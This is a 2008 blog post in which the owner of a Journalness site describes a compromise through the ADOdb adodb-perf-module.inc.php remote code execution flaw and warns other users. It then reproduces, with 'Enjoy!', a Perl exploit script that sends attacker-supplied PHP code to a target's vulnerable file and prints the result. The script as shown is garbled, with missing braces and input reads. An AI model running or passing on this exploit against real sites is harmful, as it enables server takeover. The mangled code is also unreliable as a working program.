01 March 2008

Journalness AdodB-Perf-Module.Inc.PHP Vulnerability

A couple of weeks ago we got an email from 1and1.com containing a couple of lines from our site's access log. They told us that those lines demonstrated that our site had been hacked. At first I was a bit skeptical but after analyzing the logs it turns out that Journalness has this exploit. A package that we include in our source called Adodb has an exploit that allows remote code execution. So basically someone exploited one of our sites and used it to wget some files onto our webspace. Unfortunately I removed the files before getting a chance to look into what exactly they did.
I had decided to move to blogger about a week before we got this notice. Which just happened to be right around the same time the old site was exploited. So I had already downloaded backups of everything and was getting ready to take down the old pages anyway. Go figure. I would advise anyone using Journalness to either figure out how to fix this exploit, or stop using journalness altogether. It looks like the exploit requires REGISTER_GLOBALS to be turned on, but I wouldn't bet on it. Journalness is no longer maintained. Blogger does everything I ever intended to have Journalness do. So I'm happy.

Here is an example of the exploit. Enjoy!

# Vendor url: journalness.sourceforge.net
# note: exploit requires Register_globals = On in php.ini
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;

print "#
# Journalness <= 4.1 Remote Code Execution exploit # By Iron - randombase.com # Greets to everyone at RootShell Security Group & dHack # # Example target url: http://www.target.com/journalnessdir/ Target url?"; chomp($target=);
if($target !~ /^http:\/\//)
$target = "http://".$target;
if($target !~ /\/$/)
$target .= "/";
print "PHP code to evaluate? ";
$code =~ s/(<\?php|\?>|<\?)//ig; $target .= "includes/database/adodb-perf-module.inc.php? last_module=t{};%20class%20t{};".$code."//"; $ua = LWP::UserAgent->new;

$response = $ua->get($target);

if ($response->is_success)
print "\n"."#" x 20 ."\n";
print $response->content;
print "\n"."#" x 20 ."\n";
die "Error: ".$response->status_line;


No comments:

Post a Comment